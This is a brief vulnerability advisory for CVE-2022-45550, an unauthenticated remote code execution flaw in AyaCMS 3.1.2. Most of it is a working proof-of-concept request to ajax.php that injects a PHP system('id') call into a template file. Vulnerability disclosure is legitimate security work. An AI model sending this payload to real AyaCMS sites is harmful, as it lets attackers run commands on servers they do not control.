Headline
CVE-2022-45550: AyaCMS has an Unauthorized Remote Code Execution Vulnerability
AyaCMS 3.1.2 is vulnerable to Remote Code Execution (RCE).
Request the url below.
http://localhost/ajax.php?fun=diy_save&tpl_file=[%22aya/template/default/footer.html%22]&diy={%22t%22:[%22t%22,%22c2b8cc463f0243617d136a57b8ef0e3a_0%22,%22{\%22pars\%22:\%22t\%22,\%22name\%22:\%22t%27,%27%27}{system(%27id%27)}{\%22}%22]}